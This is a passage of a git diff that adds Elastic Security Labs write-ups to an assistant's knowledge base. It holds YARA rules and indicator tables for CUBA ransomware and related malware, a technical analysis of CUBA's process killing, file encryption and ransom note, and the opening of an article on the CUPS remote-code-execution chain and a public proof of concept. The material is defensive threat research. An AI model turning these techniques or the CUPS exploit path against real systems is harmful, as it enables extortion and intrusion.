+        $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }
+        $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? }
+        $b1 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }
+        $c1 = "-windowstyle hidden -executionpolicy bypass -file"
+        $c2 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShell.exe"
+        $c3 = "ReflectiveLoader"
+        $c4 = "\\Sysnative\\"
+        $c5 = "TEMP%u.CMD"
+        $c6 = "TEMP%u.PS1"
+        $c7 = "\\TEMP%d.%s"
+        $c8 = "NtSetContextThread"
+        $c9 = "NtResumeThread"
+    condition:
+        ($a1 or $a2 or $b1) or 6 of ($c*)
+}
+
+rule Windows_Ransomware_Cuba {
+    meta:
+        os = "Windows"
+        arch = "x86"
+        category_type = "Ransomware"
+        family = "Cuba"
+        threat_name = "Windows.Ransomware.Cuba"
+        Reference_sample =
+"33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e"
+
+    strings:
+       $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }
+       $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }
+      $b1 = "We also inform that your databases, ftp server and file server were downloaded by us to our     servers." ascii fullword
+      $b2 = "Good day. All your files are encrypted. For decryption contact us." ascii fullword
+       $b3 = ".cuba" wide fullword
+
+    condition:
+        any of ($a*) or all of ($b*)
+}
+```
+
+## Defensive Recommendations
+
+- Enable Elastic Security Memory and Ransomware protections
+
+- Review and ensure that you have deployed the latest Microsoft Security Updates
+- Maintain backups of your critical systems to aid in quick recovery
+- Attack surface reduction
+- Network segmentation
+
+## Observations
+
+Atomic indicators observed in our investigation.
+
+|
+| |
+| Indicator | Type | Reference from blog | Note |
+| --- | --- | --- | --- |
+| 43f7d739f00c2fdc67f7ab6b976565a323a181fb6570ac3d261dff197f820165 | SHA-256 | afk.ttf | |
+| 159.203.70[.]39 | ipv4-addr | afk.ttf C2 IP | |
+| 728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da | SHA-256 | add2.exe | |
+| 208.76.253[.]84 | ipv4-addr | add2.exe C2 IP | |
+| c24d7a93d6a5c33e673e6b0fd171701c4646e67cf2328f41739ef9b50302a02e | SHA-256 | add.dll | |
+| 108.170.31[.]115 | ipv4-addr | add.dll C2 IP | |
+| 62f1fbb6f151bcc67fe68e06031af00bc87ae7e4d9d0a6a60a31d140def09365 | SHA-256 | 94-79.dll | |
+| 5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378 | SHA-256 | ra.exe | |
+| 9c71b67411b1432931b4b135dc945f6f7f9da3c295a7449f3ab8dcb56681fa70 | SHA-256 | cps.exe | |
+| e35632770a23d8e006e149b038c2ccf576c2da0998d830bbc7d7614dc5c22db5 | SHA-256 | 14931s.dll | |
+| 38.108.119[.]121 | ipv4-addr | Agent32.bin stage location | |
+| 64.235.39[.]82 | ipv4-addr | Agent32.bin stage location | |
+| 17edf458f7b8baae5ddef725e255d3a7bb6c960830503556f157655308895128 | SHA-256 | Agent32.bin (BUGHATCH) | |
+| 2e6fffad384cd6ce93cc1cde97911063e640c1953dac0507cd5f5b4b3d21bb69 | SHA-256 | Agent32.bin (BUGHATCH) | |
+| 144.172.83[.]13 | ipv4-addr | Agent32.bin C2 IP | |
+| 3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0 | SHA-256 | zero.exe | |
+| cdf2b3fbff2649a119051c63904476e70262bde2f6a9a7da8b7db13cbf257851 | SHA-256 | d478.dll | |
+| 104.217.8[.]100 | ipv4-addr | SystemBC infrastructure | |
+| 193.23.244[.]244 | ipv4-addr | SystemBC Tor directory authority | |
+| 86.59.21[.]38 | ipv4-addr | SystemBC Tor directory authority | |
+| 199.58.81[.]140 | ipv4-addr | SystemBC Tor directory authority | |
+| 204.13.164[.]118 | ipv4-addr | SystemBC Tor directory authority | |
+| 194.109.206[.]212 | ipv4-addr | SystemBC Tor directory authority | |
+| 131.188.40[.]189 | ipv4-addr | SystemBC Tor directory authority | |
+| 154.35.175[.]225 | ipv4-addr | SystemBC Tor directory authority | |
+| 171.25.193[.]9 | ipv4-addr | SystemBC Tor directory authority | |
+| 128.31.0[.]34 | ipv4-addr | SystemBC Tor directory authority | |
+| 128.31.0[.]39 | ipv4-addr | SystemBC Tor directory authority | |
+| bluetechsupply[.]com/components/temp.png | url | Cobalt Strike C2 URL | |
+| bluetechsupply[.]com | domain-name | Cobalt Strike C2 | |
+| 217.79.243[.]148 | ipv4-addr | Cobalt Strike C2 | |
+| mvnetworking[.]com | domain-name | Cobalt Strike C2 | |
+| mvnetworking[.]com/files/dhl.jpg | url | Cobalt Strike C2 URL | |
+| 149.255.35[.]131 | ipv4-addr | Cobalt Strike C2 | |
+| ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4 | SHA-256 | defender.exe \ DefenderControl.exe | |
+| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA-256 | A.exe \ (CUBA RANSOMWARE) | |
+| b16e0d27e6fa24d3fe7c9ed9167474fbc1cde13ce047878bbd16548cfdf45be3 | SHA-256 | Anet.exe(CUBA RANSOMWARE) | |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_malware_analysis.md
new file mode 100644
index 0000000000000..27f8ca38565d9
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_malware_analysis.md
@@ -0,0 +1,443 @@
+---
+title: "CUBA Ransomware Malware Analysis"
+slug: "cuba-ransomware-malware-analysis"
+date: "2023-02-14"
+description: "Elastic Security has performed a deep technical analysis of the CUBA ransomware family. This includes malware capabilities as well as defensive countermeasures."
+author:
+  - slug: salim-bitam
+image: "blog-thumb-coin-stacks.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - ref9019
+  - cuba
+  - ransomware
+---
+
+## Summary
+
+As a part of Elastic Security’s ongoing threat detection and monitoring efforts, we have recently observed a ransomware intrusion by the CUBA ransomware threat group, internally tracked as REF9019. This report will detail the inner workings of the ransomware deployed inside the network to encrypt the victim’s files. Cuba ransomware provides the attacker with the flexibility to encrypt both local and network shares files in the enterprise. CUBA uses the ChaCha20 cipher algorithm for symmetric encryption and RSA encryption to protect the ChaCha20 keys. CUBA is multithreaded for faster encryption with resource access synchronization to avoid file corruption.
+
+In this analysis we will describe the following:
+
+- Operations mode
+- Process and services termination
+- Enumeration of volumes
+- Threading implementation
+- File encryption and algorithms used
+- MITRE Attack mapping
+- YARA rule
+- Indicators of compromise
+
+### Static Analysis
+
+|                 |                                                                  |
+| --------------- | ---------------------------------------------------------------- | --- |
+| SHA256 Packed   | 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 |
+| SHA256 Unpacked | 3654af86dc682e95c811e4fd87ea405b627bca81c656f3a520a4b24bf2de879f |
+| File Size       | 135168 bytes                                                     |
+| FileType:       | Executable                                                       |
+| Imphash:        | CA5F4AF10ABC885182F3FB9ED425DE65                                 |
+| Compile Time    | Wed Mar 09 22:00:31 2022                                         | UTC |
+| Entropy         | 6.582                                                            |
+
+### Sections
+
+|        |                |              |          |         |                                  |
+| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |
+| Name   | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5                              |
+| .text  | 0x00401000     | 0x13B5F      | 0x13C00  | 6.608   | 931B22064E9E214BF59A4E07A6CA9109 |
+| .rdata | 0x00415000     | 0xA71C       | 0xA800   | 5.855   | F6F97411BCD64126A96B08BA9AE1E775 |
+| .data  | 0x00420000     | 0x16B0       | 0xC00    | 3.450   | 03B1B11B4531BB656E43A8B457D4A5F7 |
+| .rsrc  | 0x00422000     | 0x1E0        | 0x200    | 4.704   | F754ADBD7F5D6195FD6D527001CAB98C |
+| .reloc | 0x00423000     | 0x1200       | 0x1200   | 6.573   | 08B0994DAECAAAA4173B388A80CC52FE |
+
+> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:
+>
+> - [CUBA Campaign Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)
+> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)
+
+### Imports
+
+```
+GetProcessImageFileNameW
+EnumProcesses
+NetApiBufferFree
+NetShareEnum
+GetIpNetTable
+PathFindFileNameW
+FindFirstFileExW
+FindFirstFileW
+FindNextFileW
+WriteFile
+SetFileAttributesW
+MoveFileExW
+FindFirstVolumeW
+TerminateProcess
+GetEnvironmentStringsW
+OpenProcess
+GetCurrentProcessId
+CreateProcessW
+GetVolumePathNamesForVolumeNameW
+FindNextVolumeW
+GetCurrentThreadId
+RaiseException
+GetModuleHandleExW
+OpenProcessToken
+CryptAcquireContextA
+CryptGenRandom
+CryptReleaseContext
+AdjustTokenPrivileges
+LookupPrivilegeValueA
+ControlService
+ChangeServiceConfigW
+PathAddBackslashW
+GetCPInfo
+GetOEMCP
+IsValidCodePage
+lstrcpynW
+InterlockedDecrement
+FindClose
+CreateFileW
+Sleep
+lstrcatW
+CloseHandle
+CreateThread
+lstrcpyW
+lstrcmpW
+ReadFile
+GetFileSizeEx
+EnterCriticalSection
+GetCurrentProcess
+GetModuleFileNameW
+LeaveCriticalSection
+GetCommandLineA
+WaitForSingleObject
+GetLastError
+SetEvent
+GetDiskFreeSpaceExW
+ResetEvent
+GetWindowsDirectoryW
+SetFilePointerEx
+ExitProcess
+CreateEventA
+lstrcmpiW
+GetTickCount
+DeleteCriticalSection
+QueryPerformanceCounter
+SetStdHandle
+FreeEnvironmentStringsW
+GetCommandLineW
+DecodePointer
+GetStringTypeW
+GetProcessHeap
+FlushFileBuffers
+GetConsoleCP
+HeapSize
+WriteConsoleW
+InitializeCriticalSection
+UnhandledExceptionFilter
+SetUnhandledExceptionFilter
+IsProcessorFeaturePresent
+InitializeCriticalSectionAndSpinCount
+WaitForSingleObjectEx
+CreateEventW
+GetModuleHandleW
+GetProcAddress
+IsDebuggerPresent
+GetStartupInfoW
+GetSystemTimeAsFileTime
+InitializeSListHead
+RtlUnwind
+SetLastError
+EncodePointer
+TlsAlloc
+TlsGetValue
+TlsSetValue
+TlsFree
+FreeLibrary
+LoadLibraryExW
+GetFileType
+GetStdHandle
+MultiByteToWideChar
+WideCharToMultiByte
+GetACP
+HeapFree
+HeapAlloc
+LCMapStringW
+HeapReAlloc
+GetConsoleMode
+CharLowerW
+GetKeyboardLayoutList
+wsprintfW
+CloseServiceHandle
+OpenSCManagerW
+OpenServiceW
+QueryServiceStatusEx
+```
+
+### Strings
+
+```
+Good day. All your files are encrypted. For decryption contact us.
+Write here waterstatus@cock.li
+reserve admin@encryption-support.com
+jabber cuba_support@exploit.im
+We also inform that your databases, ftp server and file server were downloaded by us to our servers.
+If we do not receive a message from you within three days, we regard this as a refusal to negotiate.
+Check our platform: http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion/
+* Do not rename encrypted files.
+* Do not try to decrypt your data using third party software,
+  it may cause permanent data loss.
+* Do not stop process of encryption, because partial encryption cannot be decrypted.
+!! READ ME !!.txt
+```
+
+## Code Analysis
+
+### Entry Point
+
+The malware starts by retrieving the active input locale identifier of the victim using the GetKeyboardLayout API. When the Russian language is in the list of supported languages of the machine, the process deletes and terminates itself with a simple command line: c:\system32\cmd.exe c/ del PATH_TO_BINARY without encrypting the file system.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image5-cuba-ransomware-elastic.jpg)
+
+### Command-line Options
+
+The threat actor included 4 different operations based on the following command-line arguments:
+
+- The network keyword
+- An IP keyword
+- A path keyword
+- The local keyword
+  ![](/assets/images/cuba-ransomware-malware-analysis/image12-cuba-ransomware-elastic.jpg)
+
+**Network keyword parameter**
+
+When specifying the network keyword, the malware retrieves the Address Resolution Protocol (ARP) table of the machine using the GetIpNetTable Windows API and enumerates the shares of each IP in the ARP table, this information is added to a linked list that will be accessed by the encryption capability, which will be discussed further below in detail.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image13-cuba-ransomware-elastic.jpg)
+
+**IP keyword parameter**
+
+By specifying an IP address as the first parameter in the command line the malware proceeds by enumerating and encrypting every share found for the specified IP.
+
+**Path keyword parameter**
+
+The malware will encrypt the local directory contents, or the file provided, as the first parameter of the command-line.
+
+**Local keyword parameter**
+
+The local keyword is used to encrypt every local volume on the machine, and because the malware targets volumes by their ID, it can encrypt both mounted and unmounted volumes.
+
+### Process Termination
+
+CUBA starts by acquiring SeDebugPrivilege and then terminates a hardcoded list of processes and services using a common Windows API (see appendix for list [[1](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-processes)], [[2](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-services)]). For some services, the malware first tries to disable the service– indicated by the second parameter of TerminateProcesses::TerminateServiceByName function. This is mainly done to prevent interference with the encryption process by applications that may lock files from external changes, for example, databases.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image8-cuba-ransomware-elastic.jpg)
+
+### Local Volume Enumeration
+
+The malware enumerates all the local volumes and for each volume larger than 1GB it saves the volume’s GUID in a custom linked list. The ransomware utilizes the CriticalSection object to access this linked list for synchronization purposes due to multiple threads accessing the same resource. This helps to avoid two threads encrypting the same file at the same time, a race condition that would corrupt the file.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image6-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-malware-analysis/image2-cuba-ransomware-elastic.jpg)
+
+### Multithreaded Encryption Synchronization
+
+After preparing a list to encrypt, CUBA ransomware spawns encryption threads with the structure defined below as a parameter. Depending on the command line arguments, the malware starts 4 threads for local encryption or 8 threads for network encryption.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image10-cuba-ransomware-elastic.jpg)
+
+When a thread finishes its task, it will decrement a counter until it reaches 0: lpParameter-\\>NumberOfThreadRunning. When the last thread completes, it will alert the program that the task is done with a call to SetEvent API, which will self delete and terminate the malware.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image11-cuba-ransomware-elastic.jpg)
+
+### Encryption Implementation
+
+The malware leverages the symmetric encryption algorithm ChaCha20 to encrypt files and the asymmetric encryption algorithm RSA to protect the ChaCha20 Key and Initialization Vector (IV). The author has utilized a customized version of [WolfSSL](https://github.com/wolfSSL/wolfssl), an open source SSL/TLS library, to implement this capability. Other samples (2957226fc315f71dc22f862065fe376efab9c21d61bbc374dde34d47cde85658) implemented a similar function using the [libtomcrypt](https://github.com/libtom/libtomcrypt) library. Other implementations may exist that are not described here.
+
+The ransomware allocates a large custom structure called block that contains all the required encryption information. It then initializes an RsaKey structure with [wc_InitRsaKey](https://www.wolfssl.com/doxygen/group__RSA.html#ga02c9b34d405c5f1c24956ee84a843ef6) and decodes an embedded 4096 bit RSA public key in [DER](https://wiki.openssl.org/index.php/DER) format using [wc_RsaPublicKeyDecode](https://www.wolfssl.com/doxygen/group__RSA.html#ga2610326206b322f33f59e31a845e24b9) which it saves to block.PubRsaKey.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image7-cuba-ransomware-elastic.jpg)
+
+### File Enumeration
+
+Each thread takes an entry from the linked list and starts recursively enumerating files starting from the root of the volume. In the case of a specific directory, the same function is called recursively except for specific directories (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) for list). Otherwise, it will ignore the ransom note file !! READ ME !!.txt and files with specific extensions (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-file-extensions) for list).
+
+![](/assets/images/cuba-ransomware-malware-analysis/image15-cuba-ransomware-elastic.jpg)
+
+The malware uses [wc_RNG_GenerateBlock](https://www.wolfssl.com/doxygen/group__Random.html#ga9a289fb3f58f4a5f7e15c2b5a1b0d7c6) a WolfSSL function, to randomly generate 44 bytes. The first 32 bytes of that are used as the ChaCha20 key and the other 12 bytes are used as the IV, it then calls a function to initiate the ChaCha20 structure block.chacha20_KeyIv that will be later used to encrypt the file content. At this point, the ransomware is ready to start encrypting and writing to the file.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image14-cuba-ransomware-elastic.jpg)
+
+Before encrypting a file, Cuba ransomware prepends a 1024 byte header, the first 256 bytes are the string FIDEL.CA and some DWORD bytes values, the next 512 bytes are the encrypted ChaCha20 KEY/IV with the public RSA key and the rest is padded with 0.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image3-cuba-ransomware-elastic.jpg)
+
+Before starting the encryption, the malware double checks if the file was already encrypted by comparing the first 8 bytes of the file to the header string FIDEL.CA. If equal, the malware terminates the encryption process as described below.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image16-cuba-ransomware-elastic.jpg)
+
+Then CUBA writes the 1024 byte header and if the file is larger than 2 MB it reads 1 MB of data at a time from the file and encrypts it with the ChaCha20 cipher. Otherwise, it will read and encrypt the entire contents at once.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image1-cuba-ransomware-elastic.jpg)
+
+The malware encrypts the file in 1 MB chunks and, depending on the file’s size, it will skip a preset number of bytes. This is done primarily to speed up the encryption process of large files, below is a table to illustrate.
+
+|                  |                      |              |
+| ---------------- | -------------------- | ------------ |
+| File Size        | Chunk Size           | Skipped Size |
+| Less than 2 MB   | All the file content | 0 MB         |
+| Less than 10 MB  | 1MB                  | 4 MB         |
+| Less than 50 MB  | 1MB                  | 8 MB         |
+| Less than 200 MB | 1MB                  | 16 MB        |
+| Less than 10 GB  | 1MB                  | 200 MB       |
+| More than 10 GB  | 1MB                  | 500 MB       |
+
+Finally, it will rename the file by adding the extension .cuba.
+
+![](/assets/images/cuba-ransomware-malware-analysis/image9-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-malware-analysis/image4-cuba-ransomware-elastic.jpg)
+
+## MITRE ATT&CK Techniques
+
+Using the MITRE ATT&CK® framework, techniques and sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)
+- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)
+- [Process Discovery](https://attack.mitre.org/techniques/T1057/)
+- [Service Stop](https://attack.mitre.org/techniques/T1489/)
+- [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+- [Indicator Removal on Host: File Deletion](https://attack.mitre.org/techniques/T1070/004/)
+- [Obfuscated Files or Information: Software Packing](https://attack.mitre.org/techniques/T1027/002/)
+- [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016/)
+- [System Location Discovery: System Language Discovery](https://attack.mitre.org/techniques/T1614/001/)
+- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)
+- [Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)
+
+## Appendix
+
+### List of Terminated Processes
+
+- sqlagent.exe
+- sqlservr.exe
+- sqlwriter.exe
+- sqlceip.exe
+- msdtc.exe
+- sqlbrowser.exe
+- vmwp.exe
+- vmsp.exe
+- outlook.exe
+- Microsoft.Exchange.Store.Worker.exe
+
+### List of Terminated Services
+
+- MySQL
+- MySQL80
+- SQLSERVERAGENT
+- MSSQLSERVER
+- SQLWriter
+- SQLTELEMETRY
+- MSDTC
+- SQLBrowser
+- vmcompute
+- vmms
+- MSExchangeUMCR
+- MSExchangeUM
+- MSExchangeTransportLogSearch
+- MSExchangeTransport
+- MSExchangeThrottling
+- MSExchangeSubmission
+- MSExchangeServiceHost
+- MSExchangeRPC
+- MSExchangeRepl
+- MSExchangePOP3BE
+- MSExchangePop3
+- MSExchangeNotificationsBroker
+- MSExchangeMailboxReplication
+- MSExchangeMailboxAssistants
+- MSExchangeIS
+- MSExchangeIMAP4BE
+- MSExchangeImap4
+- MSExchangeHMRecovery
+- MSExchangeHM
+- MSExchangeFrontEndTransport
+- MSExchangeFastSearch
+- MSExchangeEdgeSync
+- MSExchangeDiagnostics
+- MSExchangeDelivery
+- MSExchangeDagMgmt
+- MSExchangeCompliance
+- MSExchangeAntispamUpdate
+
+### Excluded Directories
+
+- \windows\
+- \program files\microsoft office\
+- \program files (x86)\microsoft office\
+- \program files\avs\
+- \program files (x86)\avs\
+- \$recycle.bin\
+- \boot\
+- \recovery\
+- \system volume information\
+- \msocache\
+- \users\all users\
+- \users\default user\
+- \users\default\
+- \temp\
+- \inetcache\
+- \google\
+
+### Excluded File Extensions
+
+- .exe
+- .dll
+- .sys
+- .ini
+- .lnk
+- .vbm
+- .cuba
+
+## YARA Rule
+
+Elastic Security has created YARA rules to identify CUBA ransomware activity.
+
+```
+rule Windows_Ransomware_Cuba {
+    meta:
+        os = "Windows"
+        arch = "x86"
+        category_type = "Ransomware"
+        family = "Cuba"
+        threat_name = "Windows.Ransomware.Cuba"
+        Reference_sample = "33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e"
+
+    strings:
+       $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }
+       $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }
+     $b1 = "We also inform that your databases, ftp server and file server were downloaded by us to our     servers." ascii fullword
+       $b2 = "Good day. All your files are encrypted. For decryption contact us." ascii fullword
+       $b3 = ".cuba" wide fullword
+
+    condition:
+        any of ($a*) or all of ($b*)
+}
+```
+
+## Observations
+
+Atomic indicators observed in our investigation.
+
+|                                                                  |        |                 |
+| ---------------------------------------------------------------- | ------ | --------------- |
+| Indicator                                                        | Type   | Note            |
+| 32beefe2c5e28e87357813c0ef91f47b631a3dff4a6235256aa123fc77564346 | SHA256 | CUBA Ransomware |
+| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA256 | CUBA Ransomware |
+| bcf0f202db47ca671ed6146040795e3c8315b7fb4f886161c675d4ddf5fdd0c4 | SHA256 | CUBA Ransomware |
+
+## Artifacts
+
+Artifacts are also available for download in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cups_overflow.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cups_overflow.md
new file mode 100644
index 0000000000000..2be741a88b697
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cups_overflow.md
@@ -0,0 +1,235 @@
+---
+title: "Cups Overflow: When your printer spills more than Ink"
+slug: "cups-overflow"
+date: "2024-09-28"
+description: "Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris."
+author:
+  - slug: mika-ayenson
+  - slug: terrance-dejesus
+  - slug: eric-forte
+  - slug: ruben-groenewoud
+image: "cups-overflow.jpg"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+tags:
+  - linux
+  - macos
+  - cups
+  - vulnerability
+  - CVE-2024-47176
+  - CVE-2024-47076
+  - CVE-2024-47175
+  - CVE-2024-47177
+---
+
+## Key takeaways
+
+* On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) disclosed multiple vulnerabilities affecting the `cups-browsed`, `libscupsfilters`, and `libppd` components of the CUPS printing system, impacting versions \<= 2.0.1.
+* The vulnerabilities allow an unauthenticated remote attacker to exploit the printing system via IPP (Internet Printing Protocol) and mDNS to achieve remote code execution (RCE) on affected systems. 
+* The attack can be initiated over the public internet or local network, targeting the UDP port 631 exposed by `cups-browsed` without any authentication requirements.
+* The vulnerability chain includes the `foomatic-rip` filter, which permits the execution of arbitrary commands through the `FoomaticRIPCommandLine` directive, a known ([CVE-2011-2697](https://nvd.nist.gov/vuln/detail/CVE-2011-2697), [CVE-2011-2964](https://nvd.nist.gov/vuln/detail/CVE-2011-2964)) but unpatched issue since 2011. 
+* Systems affected include most GNU/Linux distributions, BSDs, ChromeOS, and Solaris, many of which have the `cups-browsed` service enabled by default. 
+* By the title of the publication, “Attacking UNIX Systems via CUPS, Part I” Margaritelli likely expects to publish further research on the topic.
+* Elastic has provided protections and guidance to help organizations detect and mitigate potential exploitation of these vulnerabilities.
+
+## The CUPS RCE at a glance
+
+On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) [uncovered](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/) a chain of critical vulnerabilities in the CUPS (Common Unix Printing System) utilities, specifically in components like `cups-browsed`, `libcupsfilters`, and `libppd`. These vulnerabilities — identified as [CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176), [CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076), [CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175), and [CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177) — affect widely adopted UNIX systems such as GNU/Linux, BSDs, ChromeOS, and Solaris, exposing them to remote code execution (RCE).
+
+At the core of the issue is the lack of input validation in the CUPS components, which allows attackers to exploit the Internet Printing Protocol (IPP). Attackers can send malicious packets to the target's UDP port `631` over the Internet (WAN) or spoof DNS-SD/mDNS advertisements within a local network (LAN), forcing the vulnerable system to connect to a malicious IPP server.
+
+For context, the IPP is an application layer protocol used to send and receive print jobs over the network. These communications include sending information regarding the state of the printer (paper jams, low ink, etc.) and the state of any jobs. IPP is supported across all major operating systems including Windows, macOS, and Linux. When a printer is available, the printer broadcasts (via DNS) a message stating that the printer is ready including its Uniform Resource Identifier (URI). When Linux workstations receive this message, many Linux default configurations will automatically add and register the printer for use within the OS. As such, the malicious printer in this case will be automatically registered and made available for print jobs.
+
+Upon connecting, the malicious server returns crafted IPP attributes that are injected into PostScript Printer Description (PPD) files, which are used by CUPS to describe printer properties. These manipulated PPD files enable the attacker to execute arbitrary commands when a print job is triggered.
+
+One of the major vulnerabilities in this chain is the `foomatic-rip` filter, which has been known to allow arbitrary command execution through the FoomaticRIPCommandLine directive. Despite being vulnerable for over a decade, it remains unpatched in many modern CUPS implementations, further exacerbating the risk.
+
+> While these vulnerabilities are highly critical with a CVSS score as high as 9.9, they can be mitigated by disabling cups-browsed, blocking UDP port 631, and updating CUPS to a patched version. Many UNIX systems have this service enabled by default, making this an urgent issue for affected organizations to address.
+
+## Elastic’s POC analysis
+
+Elastic’s Threat Research Engineers initially located the original proof-of-concept written by @evilsocket, which had been leaked. However, we chose to utilize the [cupshax](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py) proof of concept (PoC) based on its ability to execute locally. 
+
+To start, the PoC made use of a custom Python class that was responsible for creating and registering the fake printer service on the network using mDNS/ZeroConf. This is mainly achieved by creating a ZeroConf service entry for the fake Internet Printing Protocol (IPP) printer. 
+
+Upon execution, the PoC broadcasts a fake printer advertisement and listens for IPP requests. When a vulnerable system sees the broadcast, the victim automatically requests the printer's attributes from a URL provided in the broadcast message. The PoC responds with IPP attributes including the FoomaticRIPCommandLine parameter, which is known for its history of CVEs. The victim generates and saves a [PostScript Printer Description](https://en.wikipedia.org/wiki/PostScript_Printer_Description) (PPD) file from these IPP attributes.
+
+At this point, continued execution requires user interaction to start a print job and choose to send it to the fake printer. Once a print job is sent, the PPD file tells CUPS how to handle the print job. The included FoomaticRIPCommandLine directive allows the arbitrary command execution on the victim machine.
+
+During our review and testing of the exploits with the Cupshax PoC, we identified several notable hurdles and key details about these vulnerable endpoint and execution processes.
+
+When running arbitrary commands to create files, we noticed that `lp` is the user and group reported for arbitrary command execution, the [default printing group](https://wiki.debian.org/SystemGroups#:~:text=lp%20(LP)%3A%20Members%20of,jobs%20sent%20by%20other%20users.) on Linux systems that use CUPS utilities. Thus, the Cupshax PoC/exploit requires both the CUPS vulnerabilities and the `lp` user to have sufficient permissions to retrieve and run a malicious payload. By default, the `lp` user on many systems will have these permissions to run effective payloads such as reverse shells; however, an alternative mitigation is to restrict `lp` such that these payloads are ineffective through native controls available within Linux such as AppArmor or SELinux policies, alongside firewall or IPtables enforcement policies. 
+
+The `lp` user in many default configurations has access to commands that are not required for the print service, for instance `telnet`. To reduce the attack surface, we recommend removing unnecessary services and adding restrictions to them where needed to prevent the `lp` user from using them. 
+
+We also took note that interactive reverse shells are not immediately supported through this technique, since the `lp` user does not have a login shell; however, with some creative tactics, we were able to still accomplish this with the PoC. Typical PoCs test the exploit by writing a file to `/tmp/`, which is trivial to detect in most cases. Note that the user writing this file will be `lp` so similar behavior will be present for attackers downloading and saving a payload on disk.
+
+Alongside these observations, the parent process, `foomatic-rip` was observed in our telemetry executing a shell, which is highly uncommon
+
+## Executing the ‘Cupshax’ POC
+
+To demonstrate the impact of these vulnerabilities, we attempted to accomplish two different scenarios: using a payload for a reverse shell using living off the land techniques and retrieving and executing a remote payload. These actions are often common for adversarial groups to attempt to leverage once a vulnerable system is identified. While in its infancy, widespread exploitation has not been observed, but likely will replicate some of the scenarios depicted below.
+
